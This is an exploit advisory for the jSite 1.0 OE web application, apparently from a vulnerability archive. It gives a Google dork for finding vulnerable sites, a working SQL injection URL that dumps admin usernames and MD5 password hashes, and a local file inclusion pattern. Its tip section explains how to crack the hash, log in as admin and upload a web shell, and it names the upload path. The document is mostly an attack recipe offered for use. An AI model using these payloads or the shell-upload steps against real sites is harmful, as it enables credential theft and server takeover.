jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities

2008-07-16 / 2008-07-17
Credit: S.W.A.T
Risk: Medium
Local: No
Remote: Yes
CWE: Not in CWE

--==+================================================================================+==-- --==+ jSite 1.0 OE Multiple Remote SQL/LFI Vulnerbility +==-- --==+================================================================================+==-- -=-=--=-=-=-=-=-=-=-=-=-=-=-=-=[ SQL Injection Exploit ]=-=-=-=-=-=-=-=-=-=-=-=- AUTHOR: S.W.A.T. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=- Download: http://www.sclek.com/jsite.zip -=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- DORK (google): "Powered by jSite 1.0 OE" -=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- DESCRIPTION: You Can See Admin User & MD5 Password ..::.. Then You Can Crack It & Login ;) -=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- EXPLOITS: www.site.com/?page=-1/**/union/**/select/**/1,2,3,concat_ws (0x3a,user,pass),admin/**/from/**/jsite_users/* -=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- NOTE/TIP: 1 Week Off & I Be Back :D ;) Admin Login Is At /admin/ U Can Upload Your Shell When U Login Successfully From This Link: www.site.com/admin/index.php?menu=uploads & Your Shell Will Be Appear Here: www.site.com/uploads/[file].php -=-=-=-=-=-=--=-=-=-=-=-=-=-[ Local File Inclusion ]=-=-=-=-=-=-=-=-=-=-=-=-=-=- Exploit: www.[target].com/Script/index.php?module=[LFI] --==+================================================================================+==-- --==+ jSite 1.0 OE Multiple Remote SQL/LFI Vulnerbility +==-- --==+================================================================================+==--

References:

http://xforce.iss.net/xforce/xfdb/43746
http://www.securityfocus.com/bid/30206
http://www.milw0rm.com/exploits/6057
http://secunia.com/advisories/31049


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top